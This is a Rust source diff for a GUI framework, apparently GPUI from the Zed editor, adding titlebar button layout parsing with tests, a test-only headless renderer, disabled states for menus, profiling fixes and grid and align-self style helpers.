+/// A window control button type used in [`WindowButtonLayout`].
+#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
+pub enum WindowButton {
+ /// The minimize button
+ Minimize,
+ /// The maximize button
+ Maximize,
+ /// The close button
+ Close,
+}
+
+impl WindowButton {
+ /// Returns a stable element ID for rendering this button.
+ pub fn id(&self) -> &'static str {
+ match self {
+ WindowButton::Minimize => "minimize",
+ WindowButton::Maximize => "maximize",
+ WindowButton::Close => "close",
+ }
+ }
+
+ #[cfg(any(target_os = "linux", target_os = "freebsd"))]
+ fn index(&self) -> usize {
+ match self {
+ WindowButton::Minimize => 0,
+ WindowButton::Maximize => 1,
+ WindowButton::Close => 2,
+ }
+ }
+}
+
+/// Maximum number of [`WindowButton`]s per side in the titlebar.
+pub const MAX_BUTTONS_PER_SIDE: usize = 3;
+
+/// Describes which [`WindowButton`]s appear on each side of the titlebar.
+///
+/// On Linux, this is read from the desktop environment's configuration
+/// (e.g. GNOME's `gtk-decoration-layout` gsetting) via [`WindowButtonLayout::parse`].
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub struct WindowButtonLayout {
+ /// Buttons on the left side of the titlebar.
+ pub left: [Option<WindowButton>; MAX_BUTTONS_PER_SIDE],
+ /// Buttons on the right side of the titlebar.
+ pub right: [Option<WindowButton>; MAX_BUTTONS_PER_SIDE],
+}
+
+#[cfg(any(target_os = "linux", target_os = "freebsd"))]
+impl WindowButtonLayout {
+ /// Returns Zed's built-in fallback button layout for Linux titlebars.
+ pub fn linux_default() -> Self {
+ Self {
+ left: [None; MAX_BUTTONS_PER_SIDE],
+ right: [
+ Some(WindowButton::Minimize),
+ Some(WindowButton::Maximize),
+ Some(WindowButton::Close),
+ ],
+ }
+ }
+
+ /// Parses a GNOME-style `button-layout` string (e.g. `"close,minimize:maximize"`).
+ pub fn parse(layout_string: &str) -> Result<Self> {
+ fn parse_side(
+ s: &str,
+ seen_buttons: &mut [bool; MAX_BUTTONS_PER_SIDE],
+ unrecognized: &mut Vec<String>,
+ ) -> [Option<WindowButton>; MAX_BUTTONS_PER_SIDE] {
+ let mut result = [None; MAX_BUTTONS_PER_SIDE];
+ let mut i = 0;
+ for name in s.split(',') {
+ let trimmed = name.trim();
+ if trimmed.is_empty() {
+ continue;
+ }
+ let button = match trimmed {
+ "minimize" => Some(WindowButton::Minimize),
+ "maximize" => Some(WindowButton::Maximize),
+ "close" => Some(WindowButton::Close),
+ other => {
+ unrecognized.push(other.to_string());
+ None
+ }
+ };
+ if let Some(button) = button {
+ if seen_buttons[button.index()] {
+ continue;
+ }
+ if let Some(slot) = result.get_mut(i) {
+ *slot = Some(button);
+ seen_buttons[button.index()] = true;
+ i += 1;
+ }
+ }
+ }
+ result
+ }
+
+ let (left_str, right_str) = layout_string.split_once(':').unwrap_or(("", layout_string));
+ let mut unrecognized = Vec::new();
+ let mut seen_buttons = [false; MAX_BUTTONS_PER_SIDE];
+ let layout = Self {
+ left: parse_side(left_str, &mut seen_buttons, &mut unrecognized),
+ right: parse_side(right_str, &mut seen_buttons, &mut unrecognized),
+ };
+
+ if !unrecognized.is_empty()
+ && layout.left.iter().all(Option::is_none)
+ && layout.right.iter().all(Option::is_none)
+ {
+ bail!(
+ "button layout string {:?} contains no valid buttons (unrecognized: {})",
+ layout_string,
+ unrecognized.join(", ")
+ );
+ }
+
+ Ok(layout)
+ }
+
+ /// Formats the layout back into a GNOME-style `button-layout` string.
+ #[cfg(test)]
+ pub fn format(&self) -> String {
+ fn format_side(buttons: &[Option<WindowButton>; MAX_BUTTONS_PER_SIDE]) -> String {
+ buttons
+ .iter()
+ .flatten()
+ .map(|button| match button {
+ WindowButton::Minimize => "minimize",
+ WindowButton::Maximize => "maximize",
+ WindowButton::Close => "close",
+ })
+ .collect::<Vec<_>>()
+ .join(",")
+ }
+
+ format!("{}:{}", format_side(&self.left), format_side(&self.right))
+ }
+}
+
/// A type to describe which sides of the window are currently tiled in some way
#[derive(Debug, Copy, Clone, Eq, PartialEq, Hash, Default)]
pub struct Tiling {
@@ -487,6 +634,7 @@ pub trait PlatformWindow: HasWindowHandle + HasDisplayHandle {
fn on_hit_test_window_control(&self, callback: Box<dyn FnMut() -> Option<WindowControlArea>>);
fn on_close(&self, callback: Box<dyn FnOnce()>);
fn on_appearance_changed(&self, callback: Box<dyn FnMut()>);
+ fn on_button_layout_changed(&self, _callback: Box<dyn FnMut()>) {}
fn draw(&self, scene: &Scene);
fn completed_frame(&self) {}
fn sprite_atlas(&self) -> Arc<dyn PlatformAtlas>;
@@ -555,6 +703,20 @@ pub trait PlatformWindow: HasWindowHandle + HasDisplayHandle {
}
}
+/// A renderer for headless windows that can produce real rendered output.
+#[cfg(any(test, feature = "test-support"))]
+pub trait PlatformHeadlessRenderer {
+ /// Render a scene and return the result as an RGBA image.
+ fn render_scene_to_image(
+ &mut self,
+ scene: &Scene,
+ size: Size<DevicePixels>,
+ ) -> Result<RgbaImage>;
+
+ /// Returns the sprite atlas used by this renderer.
+ fn sprite_atlas(&self) -> Arc<dyn PlatformAtlas>;
+}
+
/// Type alias for runnables with metadata.
/// Previously an enum with a single variant, now simplified to a direct type alias.
#[doc(hidden)]
@@ -573,6 +735,7 @@ pub trait PlatformDispatcher: Send + Sync {
fn dispatch(&self, runnable: RunnableVariant, priority: Priority);
fn dispatch_on_main_thread(&self, runnable: RunnableVariant, priority: Priority);
fn dispatch_after(&self, duration: Duration, runnable: RunnableVariant);
+
fn spawn_realtime(&self, f: Box<dyn FnOnce() + Send>);
fn now(&self) -> Instant {
@@ -592,19 +755,29 @@ pub trait PlatformDispatcher: Send + Sync {
#[expect(missing_docs)]
pub trait PlatformTextSystem: Send + Sync {
fn add_fonts(&self, fonts: Vec<Cow<'static, [u8]>>) -> Result<()>;
+ /// Get all available font names.
fn all_font_names(&self) -> Vec<String>;
+ /// Get the font ID for a font descriptor.
fn font_id(&self, descriptor: &Font) -> Result<FontId>;
+ /// Get metrics for a font.
fn font_metrics(&self, font_id: FontId) -> FontMetrics;
+ /// Get typographic bounds for a glyph.
fn typographic_bounds(&self, font_id: FontId, glyph_id: GlyphId) -> Result<Bounds<f32>>;
+ /// Get the advance width for a glyph.
fn advance(&self, font_id: FontId, glyph_id: GlyphId) -> Result<Size<f32>>;
+ /// Get the glyph ID for a character.
fn glyph_for_char(&self, font_id: FontId, ch: char) -> Option<GlyphId>;
+ /// Get raster bounds for a glyph.
fn glyph_raster_bounds(&self, params: &RenderGlyphParams) -> Result<Bounds<DevicePixels>>;
+ /// Rasterize a glyph.
fn rasterize_glyph(
&self,
params: &RenderGlyphParams,
raster_bounds: Bounds<DevicePixels>,
) -> Result<(Size<DevicePixels>, Vec<u8>)>;
+ /// Layout a line of text with the given font runs.
fn layout_line(&self, text: &str, font_size: Pixels, runs: &[FontRun]) -> LineLayout;
+ /// Returns the recommended text rendering mode for the given font and size.
fn recommended_rendering_mode(&self, _font_id: FontId, _font_size: Pixels)
-> TextRenderingMode;
}
@@ -1997,3 +2170,185 @@ impl From<String> for ClipboardString {
}
}
}
+
+#[cfg(all(test, any(target_os = "linux", target_os = "freebsd")))]
+mod tests {
+ use super::*;
+ use std::collections::HashSet;
+
+ #[test]
+ fn test_window_button_layout_parse_standard() {
+ let layout = WindowButtonLayout::parse("close,minimize:maximize").unwrap();
+ assert_eq!(
+ layout.left,
+ [
+ Some(WindowButton::Close),
+ Some(WindowButton::Minimize),
+ None
+ ]
+ );
+ assert_eq!(layout.right, [Some(WindowButton::Maximize), None, None]);
+ }
+
+ #[test]
+ fn test_window_button_layout_parse_right_only() {
+ let layout = WindowButtonLayout::parse("minimize,maximize,close").unwrap();
+ assert_eq!(layout.left, [None, None, None]);
+ assert_eq!(
+ layout.right,
+ [
+ Some(WindowButton::Minimize),
+ Some(WindowButton::Maximize),
+ Some(WindowButton::Close)
+ ]
+ );
+ }
+
+ #[test]
+ fn test_window_button_layout_parse_left_only() {
+ let layout = WindowButtonLayout::parse("close,minimize,maximize:").unwrap();
+ assert_eq!(
+ layout.left,
+ [
+ Some(WindowButton::Close),
+ Some(WindowButton::Minimize),
+ Some(WindowButton::Maximize)
+ ]
+ );
+ assert_eq!(layout.right, [None, None, None]);
+ }
+
+ #[test]
+ fn test_window_button_layout_parse_with_whitespace() {
+ let layout = WindowButtonLayout::parse(" close , minimize : maximize ").unwrap();
+ assert_eq!(
+ layout.left,
+ [
+ Some(WindowButton::Close),
+ Some(WindowButton::Minimize),
+ None
+ ]
+ );
+ assert_eq!(layout.right, [Some(WindowButton::Maximize), None, None]);
+ }
+
+ #[test]
+ fn test_window_button_layout_parse_empty() {
+ let layout = WindowButtonLayout::parse("").unwrap();
+ assert_eq!(layout.left, [None, None, None]);
+ assert_eq!(layout.right, [None, None, None]);
+ }
+
+ #[test]
+ fn test_window_button_layout_parse_intentionally_empty() {
+ let layout = WindowButtonLayout::parse(":").unwrap();
+ assert_eq!(layout.left, [None, None, None]);
+ assert_eq!(layout.right, [None, None, None]);
+ }
+
+ #[test]
+ fn test_window_button_layout_parse_invalid_buttons() {
+ let layout = WindowButtonLayout::parse("close,invalid,minimize:maximize,foo").unwrap();
+ assert_eq!(
+ layout.left,
+ [
+ Some(WindowButton::Close),
+ Some(WindowButton::Minimize),
+ None
+ ]
+ );
+ assert_eq!(layout.right, [Some(WindowButton::Maximize), None, None]);
+ }
+
+ #[test]
+ fn test_window_button_layout_parse_deduplicates_same_side_buttons() {
+ let layout = WindowButtonLayout::parse("close,close,minimize").unwrap();
+ assert_eq!(
+ layout.right,
+ [
+ Some(WindowButton::Close),
+ Some(WindowButton::Minimize),
+ None
+ ]
+ );
+ assert_eq!(layout.format(), ":close,minimize");
+ }
+
+ #[test]
+ fn test_window_button_layout_parse_deduplicates_buttons_across_sides() {
+ let layout = WindowButtonLayout::parse("close:maximize,close,minimize").unwrap();
+ assert_eq!(layout.left, [Some(WindowButton::Close), None, None]);
+ assert_eq!(
+ layout.right,
+ [
+ Some(WindowButton::Maximize),
+ Some(WindowButton::Minimize),
+ None
+ ]
+ );
+
+ let button_ids: Vec<_> = layout
+ .left
+ .iter()
+ .chain(layout.right.iter())
+ .flatten()
+ .map(WindowButton::id)
+ .collect();
+ let unique_button_ids = button_ids.iter().copied().collect::<HashSet<_>>();
+ assert_eq!(unique_button_ids.len(), button_ids.len());
+ assert_eq!(layout.format(), "close:maximize,minimize");
+ }
+
+ #[test]
+ fn test_window_button_layout_parse_gnome_style() {
+ let layout = WindowButtonLayout::parse("close").unwrap();
+ assert_eq!(layout.left, [None, None, None]);
+ assert_eq!(layout.right, [Some(WindowButton::Close), None, None]);
+ }
+
+ #[test]
+ fn test_window_button_layout_parse_elementary_style() {
+ let layout = WindowButtonLayout::parse("close:maximize").unwrap();
+ assert_eq!(layout.left, [Some(WindowButton::Close), None, None]);
+ assert_eq!(layout.right, [Some(WindowButton::Maximize), None, None]);
+ }
+
+ #[test]
+ fn test_window_button_layout_round_trip() {
+ let cases = [
+ "close:minimize,maximize",
+ "minimize,maximize,close:",
+ ":close",
+ "close:",
+ "close:maximize",
+ ":",
+ ];
+
+ for case in cases {
+ let layout = WindowButtonLayout::parse(case).unwrap();
+ assert_eq!(layout.format(), case, "Round-trip failed for: {}", case);
+ }
+ }
+
+ #[test]
+ fn test_window_button_layout_linux_default() {
+ let layout = WindowButtonLayout::linux_default();
+ assert_eq!(layout.left, [None, None, None]);
+ assert_eq!(
+ layout.right,
+ [
+ Some(WindowButton::Minimize),
+ Some(WindowButton::Maximize),
+ Some(WindowButton::Close)
+ ]
+ );
+
+ let round_tripped = WindowButtonLayout::parse(&layout.format()).unwrap();
+ assert_eq!(round_tripped, layout);
+ }
+
+ #[test]
+ fn test_window_button_layout_parse_all_invalid() {
+ assert!(WindowButtonLayout::parse("asdfghjkl").is_err());
+ }
+}
@@ -7,14 +7,39 @@ pub struct Menu {
/// The items in the menu
pub items: Vec<MenuItem>,
+
+ /// Whether this menu is disabled
+ pub disabled: bool,
}
impl Menu {
+ /// Create a new Menu with the given name
+ pub fn new(name: impl Into<SharedString>) -> Self {
+ Self {
+ name: name.into(),
+ items: vec![],
+ disabled: false,
+ }
+ }
+
+ /// Set items to be in this menu
+ pub fn items(mut self, items: impl IntoIterator<Item = MenuItem>) -> Self {
+ self.items = items.into_iter().collect();
+ self
+ }
+
+ /// Set whether this menu is disabled
+ pub fn disabled(mut self, disabled: bool) -> Self {
+ self.disabled = disabled;
+ self
+ }
+
/// Create an OwnedMenu from this Menu
pub fn owned(self) -> OwnedMenu {
OwnedMenu {
name: self.name.to_string().into(),
items: self.items.into_iter().map(|item| item.owned()).collect(),
+ disabled: self.disabled,
}
}
}
@@ -72,6 +97,9 @@ pub enum MenuItem {
/// Whether this action is checked
checked: bool,
+
+ /// Whether this action is disabled
+ disabled: bool,
},
}
@@ -101,6 +129,7 @@ impl MenuItem {
action: Box::new(action),
os_action: None,
checked: false,
+ disabled: false,
}
}
@@ -115,6 +144,7 @@ impl MenuItem {
action: Box::new(action),
os_action: Some(os_action),
checked: false,
+ disabled: false,
}
}
@@ -128,11 +158,13 @@ impl MenuItem {
action,
os_action,
checked,
+ disabled,
} => OwnedMenuItem::Action {
name: name.into(),
action,
os_action,
checked,
+ disabled,
},
MenuItem::SystemMenu(os_menu) => OwnedMenuItem::SystemMenu(os_menu.owned()),
}
@@ -142,19 +174,49 @@ impl MenuItem {
///
/// Only for [`MenuItem::Action`], otherwise, will be ignored
pub fn checked(mut self, checked: bool) -> Self {
+ match &mut self {
+ MenuItem::Action { checked: old, .. } => {
+ *old = checked;
+ }
+ _ => {}
+ }
+ self
+ }
+
+ /// Returns whether this menu item is checked
+ ///
+ /// Only for [`MenuItem::Action`], otherwise, returns false
+ #[inline]
+ pub fn is_checked(&self) -> bool {
match self {
- MenuItem::Action {
- action,
- os_action,
- name,
- ..
- } => MenuItem::Action {
- name,
- action,
- os_action,
- checked,
- },
- _ => self,
+ MenuItem::Action { checked, .. } => *checked,
+ _ => false,
+ }
+ }
+
+ /// Set whether this menu item is disabled
+ pub fn disabled(mut self, disabled: bool) -> Self {
+ match &mut self {
+ MenuItem::Action { disabled: old, .. } => {
+ *old = disabled;
+ }
+ MenuItem::Submenu(submenu) => {
+ submenu.disabled = disabled;
+ }
+ _ => {}
+ }
+ self
+ }
+
+ /// Returns whether this menu item is disabled
+ ///
+ /// Only for [`MenuItem::Action`] and [`MenuItem::Submenu`], otherwise, returns false
+ #[inline]
+ pub fn is_disabled(&self) -> bool {
+ match self {
+ MenuItem::Action { disabled, .. } => *disabled,
+ MenuItem::Submenu(submenu) => submenu.disabled,
+ _ => false,
}
}
}
@@ -179,6 +241,9 @@ pub struct OwnedMenu {
/// The items in the menu
pub items: Vec<OwnedMenuItem>,
+
+ /// Whether this menu is disabled
+ pub disabled: bool,
}
/// The different kinds of items that can be in a menu
@@ -206,6 +271,9 @@ pub enum OwnedMenuItem {
/// Whether this action is checked
checked: bool,
+
+ /// Whether this action is disabled
+ disabled: bool,
},
}
@@ -219,11 +287,13 @@ impl Clone for OwnedMenuItem {
action,
os_action,
checked,
+ disabled,
} => OwnedMenuItem::Action {
name: name.clone(),
action: action.boxed_clone(),
os_action: *os_action,
checked: *checked,
+ disabled: *disabled,
},
OwnedMenuItem::SystemMenu(os_menu) => OwnedMenuItem::SystemMenu(os_menu.clone()),
}
@@ -287,3 +357,70 @@ pub(crate) fn init_app_menus(platform: &dyn Platform, cx: &App) {
}
}));
}
+
+#[cfg(test)]
+mod tests {
+ use crate::Menu;
+
+ #[test]
+ fn test_menu() {
+ let menu = Menu::new("App")
+ .items(vec![
+ crate::MenuItem::action("Action 1", gpui::NoAction),
+ crate::MenuItem::separator(),
+ ])
+ .disabled(true);
+
+ assert_eq!(menu.name.as_ref(), "App");
+ assert_eq!(menu.items.len(), 2);
+ assert!(menu.disabled);
+ }
+
+ #[test]
+ fn test_menu_item_builder() {
+ use super::MenuItem;
+
+ let item = MenuItem::action("Test Action", gpui::NoAction);
+ assert_eq!(
+ match &item {
+ MenuItem::Action { name, .. } => name.as_ref(),
+ _ => unreachable!(),
+ },
+ "Test Action"
+ );
+ assert!(matches!(
+ item,
+ MenuItem::Action {
+ checked: false,
+ disabled: false,
+ ..
+ }
+ ));
+
+ assert!(
+ MenuItem::action("Test Action", gpui::NoAction)
+ .checked(true)
+ .is_checked()
+ );
+ assert!(
+ MenuItem::action("Test Action", gpui::NoAction)
+ .disabled(true)
+ .is_disabled()
+ );
+
+ let submenu = MenuItem::submenu(super::Menu {
+ name: "Submenu".into(),
+ items: vec![],
+ disabled: true,
+ });
+ assert_eq!(
+ match &submenu {
+ MenuItem::Submenu(menu) => menu.name.as_ref(),
+ _ => unreachable!(),
+ },
+ "Submenu"
+ );
+ assert!(!submenu.is_checked());
+ assert!(submenu.is_disabled());
+ }
+}
@@ -30,11 +30,12 @@ impl TestDispatcher {
.map_or(false, |var| var == "1" || var == "true"),
timeout_ticks: 0..=1000,
}));
+ Self::from_scheduler(scheduler)
+ }
- let session_id = scheduler.allocate_session_id();
-
+ pub fn from_scheduler(scheduler: Arc<TestScheduler>) -> Self {
TestDispatcher {
- session_id,
+ session_id: scheduler.allocate_session_id(),
scheduler,
num_cpus_override: Arc::new(AtomicUsize::new(0)),
}
@@ -76,6 +77,14 @@ impl TestDispatcher {
while self.tick(false) {}
}
+ pub fn allow_parking(&self) {
+ self.scheduler.allow_parking();
+ }
+
+ pub fn forbid_parking(&self) {
+ self.scheduler.forbid_parking();
+ }
+
/// Override the value returned by `BackgroundExecutor::num_cpus()` in tests.
/// A value of 0 means no override (the default of 4 is used).
pub fn set_num_cpus(&self, count: usize) {
@@ -1,9 +1,9 @@
use crate::{
AnyWindowHandle, BackgroundExecutor, ClipboardItem, CursorStyle, DevicePixels,
DummyKeyboardMapper, ForegroundExecutor, Keymap, NoopTextSystem, Platform, PlatformDisplay,
- PlatformKeyboardLayout, PlatformKeyboardMapper, PlatformTextSystem, PromptButton,
- ScreenCaptureFrame, ScreenCaptureSource, ScreenCaptureStream, SourceMetadata, Task,
- TestDisplay, TestWindow, ThermalState, WindowAppearance, WindowParams, size,
+ PlatformHeadlessRenderer, PlatformKeyboardLayout, PlatformKeyboardMapper, PlatformTextSystem,
+ PromptButton, ScreenCaptureFrame, ScreenCaptureSource, ScreenCaptureStream, SourceMetadata,
+ Task, TestDisplay, TestWindow, ThermalState, WindowAppearance, WindowParams, size,
};
use anyhow::Result;
use collections::VecDeque;
@@ -34,6 +34,7 @@ pub(crate) struct TestPlatform {
pub opened_url: RefCell<Option<String>>,
pub text_system: Arc<dyn PlatformTextSystem>,
pub expect_restart: RefCell<Option<oneshot::Sender<Option<PathBuf>>>>,
+ headless_renderer_factory: Option<Box<dyn Fn() -> Option<Box<dyn PlatformHeadlessRenderer>>>>,
weak: Weak<Self>,
}
@@ -88,8 +89,30 @@ pub(crate) struct TestPrompts {
impl TestPlatform {
pub fn new(executor: BackgroundExecutor, foreground_executor: ForegroundExecutor) -> Rc<Self> {
- let text_system = Arc::new(NoopTextSystem);
-
+ Self::with_platform(
+ executor,
+ foreground_executor,
+ Arc::new(NoopTextSystem),
+ None,
+ )
+ }
+
+ pub fn with_text_system(
+ executor: BackgroundExecutor,
+ foreground_executor: ForegroundExecutor,
+ text_system: Arc<dyn PlatformTextSystem>,
+ ) -> Rc<Self> {
+ Self::with_platform(executor, foreground_executor, text_system, None)
+ }
+
+ pub fn with_platform(
+ executor: BackgroundExecutor,
+ foreground_executor: ForegroundExecutor,
+ text_system: Arc<dyn PlatformTextSystem>,
+ headless_renderer_factory: Option<
+ Box<dyn Fn() -> Option<Box<dyn PlatformHeadlessRenderer>>>,
+ >,
+ ) -> Rc<Self> {
Rc::new_cyclic(|weak| TestPlatform {
background_executor: executor,
foreground_executor,
@@ -107,6 +130,7 @@ impl TestPlatform {
weak: weak.clone(),
opened_url: Default::default(),
text_system,
+ headless_renderer_factory,
})
}
@@ -299,11 +323,13 @@ impl Platform for TestPlatform {
handle: AnyWindowHandle,
params: WindowParams,
) -> anyhow::Result<Box<dyn crate::PlatformWindow>> {
+ let renderer = self.headless_renderer_factory.as_ref().and_then(|f| f());
let window = TestWindow::new(
handle,
params,
self.weak.clone(),
self.active_display.clone(),
+ renderer,
);
Ok(Box::new(window))
}
@@ -1,10 +1,12 @@
use crate::{
- AnyWindowHandle, AtlasKey, AtlasTextureId, AtlasTile, Bounds, DispatchEventResult, GpuSpecs,
- Pixels, PlatformAtlas, PlatformDisplay, PlatformInput, PlatformInputHandler, PlatformWindow,
- Point, PromptButton, RequestFrameOptions, Size, TestPlatform, TileId, WindowAppearance,
+ AnyWindowHandle, AtlasKey, AtlasTextureId, AtlasTile, Bounds, DevicePixels,
+ DispatchEventResult, GpuSpecs, Pixels, PlatformAtlas, PlatformDisplay,
+ PlatformHeadlessRenderer, PlatformInput, PlatformInputHandler, PlatformWindow, Point,
+ PromptButton, RequestFrameOptions, Scene, Size, TestPlatform, TileId, WindowAppearance,
WindowBackgroundAppearance, WindowBounds, WindowControlArea, WindowParams,
};
use collections::HashMap;
+use image::RgbaImage;
use parking_lot::Mutex;
use raw_window_handle::{HasDisplayHandle, HasWindowHandle};
use std::{
@@ -21,6 +23,7 @@ pub(crate) struct TestWindowState {
platform: Weak<TestPlatform>,
// TODO: Replace with `Rc`
sprite_atlas: Arc<dyn PlatformAtlas>,
+ renderer: Option<Box<dyn PlatformHeadlessRenderer>>,
pub(crate) should_close_handler: Option<Box<dyn FnMut() -> bool>>,
hit_test_window_control_callback: Option<Box<dyn FnMut() -> Option<WindowControlArea>>>,
input_callback: Option<Box<dyn FnMut(PlatformInput) -> DispatchEventResult>>,
@@ -57,13 +60,19 @@ impl TestWindow {
params: WindowParams,
platform: Weak<TestPlatform>,
display: Rc<dyn PlatformDisplay>,
+ renderer: Option<Box<dyn PlatformHeadlessRenderer>>,
) -> Self {
+ let sprite_atlas: Arc<dyn PlatformAtlas> = match &renderer {
+ Some(r) => r.sprite_atlas(),
+ None => Arc::new(TestAtlas::new()),
+ };
Self(Rc::new(Mutex::new(TestWindowState {
bounds: params.bounds,
display,
platform,
handle,
- sprite_atlas: Arc::new(TestAtlas::new()),
+ sprite_atlas,
+ renderer,
title: Default::default(),
edited: false,
should_close_handler: None,
@@ -81,10 +90,11 @@ impl TestWindow {
pub fn simulate_resize(&mut self, size: Size<Pixels>) {
let scale_factor = self.scale_factor();
let mut lock = self.0.lock();
+ // Always update bounds, even if no callback is registered
+ lock.bounds.size = size;
let Some(mut callback) = lock.resize_callback.take() else {
return;
};
- lock.bounds.size = size;
drop(lock);
callback(size, scale_factor);
self.0.lock().resize_callback = Some(callback);
@@ -275,12 +285,25 @@ impl PlatformWindow for TestWindow {
fn on_appearance_changed(&self, _callback: Box<dyn FnMut()>) {}
- fn draw(&self, _scene: &crate::Scene) {}
+ fn draw(&self, _scene: &Scene) {}
fn sprite_atlas(&self) -> sync::Arc<dyn crate::PlatformAtlas> {
self.0.lock().sprite_atlas.clone()
}
+ #[cfg(any(test, feature = "test-support"))]
+ fn render_to_image(&self, scene: &Scene) -> anyhow::Result<RgbaImage> {
+ let mut state = self.0.lock();
+ let size = state.bounds.size;
+ if let Some(renderer) = &mut state.renderer {
+ let scale_factor = 2.0;
+ let device_size: Size<DevicePixels> = size.to_device_pixels(scale_factor);
+ renderer.render_scene_to_image(scene, device_size)
+ } else {
+ anyhow::bail!("render_to_image not available: no HeadlessRenderer configured")
+ }
+ }
+
fn as_test(&mut self) -> Option<&mut TestWindow> {
Some(self)
}
@@ -169,7 +169,7 @@ pub struct ThreadTimingsDelta {
#[doc(hidden)]
pub struct ProfilingCollector {
startup_time: Instant,
- cursors: HashMap<u64, u64>,
+ cursors: HashMap<ThreadId, u64>,
}
impl ProfilingCollector {
@@ -195,7 +195,7 @@ impl ProfilingCollector {
thread.thread_id.hash(&mut hasher);
let hashed_id = hasher.finish();
- let prev_cursor = self.cursors.get(&hashed_id).copied().unwrap_or(0);
+ let prev_cursor = self.cursors.get(&thread.thread_id).copied().unwrap_or(0);
let buffer_len = thread.timings.len() as u64;
let buffer_start = thread.total_pushed.saturating_sub(buffer_len);
@@ -205,7 +205,7 @@ impl ProfilingCollector {
thread.timings.as_slice()
} else {
let skip = (prev_cursor - buffer_start) as usize;
- &thread.timings[skip..]
+ &thread.timings[skip.min(thread.timings.len())..]
};
// Don't emit the last entry if it's still in-progress (end: None).
@@ -215,12 +215,12 @@ impl ProfilingCollector {
}
let cursor_advance = if incomplete_at_end {
- thread.total_pushed - 1
+ thread.total_pushed.saturating_sub(1)
} else {
thread.total_pushed
};
- self.cursors.insert(hashed_id, cursor_advance);
+ self.cursors.insert(thread.thread_id, cursor_advance);
if slice.is_empty() {
continue;
@@ -657,7 +657,7 @@ impl Default for TransformationMatrix {
#[expect(missing_docs)]
pub struct MonochromeSprite {
pub order: DrawOrder,
- pub pad: u32, // align to 8 bytes
+ pub pad: u32,
pub bounds: Bounds<ScaledPixels>,
pub content_mask: ContentMask<ScaledPixels>,
pub color: Hsla,
@@ -695,7 +695,7 @@ impl From<SubpixelSprite> for Primitive {
#[expect(missing_docs)]
pub struct PolychromeSprite {
pub order: DrawOrder,
- pub pad: u32, // align to 8 bytes
+ pub pad: u32,
pub grayscale: bool,
pub opacity: f32,
pub bounds: Bounds<ScaledPixels>,
@@ -138,6 +138,42 @@ impl ObjectFit {
}
}
+/// The minimum size of a column or row in a grid layout
+#[derive(
+ Copy, Clone, PartialEq, Eq, PartialOrd, Ord, Debug, Default, JsonSchema, Serialize, Deserialize,
+)]
+pub enum TemplateColumnMinSize {
+ /// The column size may be 0
+ #[default]
+ Zero,
+ /// The column size can be determined by the min content
+ MinContent,
+ /// The column size can be determined by the max content
+ MaxContent,
+}
+
+/// A simplified representation of the grid-template-* value
+#[derive(
+ Copy,
+ Clone,
+ Refineable,
+ PartialEq,
+ Eq,
+ PartialOrd,
+ Ord,
+ Debug,
+ Default,
+ JsonSchema,
+ Serialize,
+ Deserialize,
+)]
+pub struct GridTemplate {
+ /// How this template directive should be repeated
+ pub repeat: u16,
+ /// The minimum size in the repeat(<>, minmax(_, 1fr)) equation
+ pub min_size: TemplateColumnMinSize,
+}
+
/// The CSS styling that can be applied to an element via the `Styled` trait
#[derive(Clone, Refineable, Debug)]
#[refineable(Debug, PartialEq, Serialize, Deserialize, JsonSchema)]
@@ -262,16 +298,12 @@ pub struct Style {
pub opacity: Option<f32>,
/// The grid columns of this element
- /// Equivalent to the Tailwind `grid-cols-<number>`
- pub grid_cols: Option<u16>,
-
- /// The grid columns with min-content minimum sizing.
- /// Unlike grid_cols, it won't shrink to width 0 in AvailableSpace::MinContent constraints.
- pub grid_cols_min_content: Option<u16>,
+ /// Roughly equivalent to the Tailwind `grid-cols-<number>`
+ pub grid_cols: Option<GridTemplate>,
/// The row span of this element
/// Equivalent to the Tailwind `grid-rows-<number>`
- pub grid_rows: Option<u16>,
+ pub grid_rows: Option<GridTemplate>,
/// The grid location of this element
pub grid_location: Option<GridLocation>,
@@ -790,7 +822,6 @@ impl Default for Style {
opacity: None,
grid_rows: None,
grid_cols: None,
- grid_cols_min_content: None,
grid_location: None,
#[cfg(debug_assertions)]
@@ -1,9 +1,9 @@
use crate::{
- self as gpui, AbsoluteLength, AlignContent, AlignItems, BorderStyle, CursorStyle,
+ self as gpui, AbsoluteLength, AlignContent, AlignItems, AlignSelf, BorderStyle, CursorStyle,
DefiniteLength, Display, Fill, FlexDirection, FlexWrap, Font, FontFeatures, FontStyle,
- FontWeight, GridPlacement, Hsla, JustifyContent, Length, SharedString, StrikethroughStyle,
- StyleRefinement, TextAlign, TextOverflow, TextStyleRefinement, UnderlineStyle, WhiteSpace, px,
- relative, rems,
+ FontWeight, GridPlacement, GridTemplate, Hsla, JustifyContent, Length, SharedString,
+ StrikethroughStyle, StyleRefinement, TemplateColumnMinSize, TextAlign, TextOverflow,
+ TextStyleRefinement, UnderlineStyle, WhiteSpace, px, relative, rems,
};
pub use gpui_macros::{
border_style_methods, box_shadow_style_methods, cursor_style_methods, margin_style_methods,
@@ -278,6 +278,55 @@ pub trait Styled: Sized {
self
}
+ /// Sets how this specific element is aligned along the container's cross axis.
+ /// [Docs](https://tailwindcss.com/docs/align-self#start)
+ fn self_start(mut self) -> Self {
+ self.style().align_self = Some(AlignSelf::Start);
+ self
+ }
+
+ /// Sets this element to align against the end of the container's cross axis.
+ /// [Docs](https://tailwindcss.com/docs/align-self#end)
+ fn self_end(mut self) -> Self {
+ self.style().align_self = Some(AlignSelf::End);
+ self
+ }
+
+ /// Sets this element to align against the start of the container's cross axis.
+ /// [Docs](https://tailwindcss.com/docs/align-self#start)
+ fn self_flex_start(mut self) -> Self {
+ self.style().align_self = Some(AlignSelf::FlexStart);
+ self
+ }
+
+ /// Sets this element to align against the end of the container's cross axis.
+ /// [Docs](https://tailwindcss.com/docs/align-self#end)
+ fn self_flex_end(mut self) -> Self {
+ self.style().align_self = Some(AlignSelf::FlexEnd);
+ self
+ }
+
+ /// Sets this element to align along the center of the container's cross axis.
+ /// [Docs](https://tailwindcss.com/docs/align-self#center)
+ fn self_center(mut self) -> Self {
+ self.style().align_self = Some(AlignSelf::Center);
+ self
+ }
+
+ /// Sets this element to align along the baseline of the container's cross axis.
+ /// [Docs](https://tailwindcss.com/docs/align-self#baseline)
+ fn self_baseline(mut self) -> Self {
+ self.style().align_self = Some(AlignSelf::Baseline);
+ self
+ }
+
+ /// Sets this element to stretch to fill the available space along the container's cross axis.
+ /// [Docs](https://tailwindcss.com/docs/align-self#stretch)
+ fn self_stretch(mut self) -> Self {
+ self.style().align_self = Some(AlignSelf::Stretch);
+ self
+ }
+
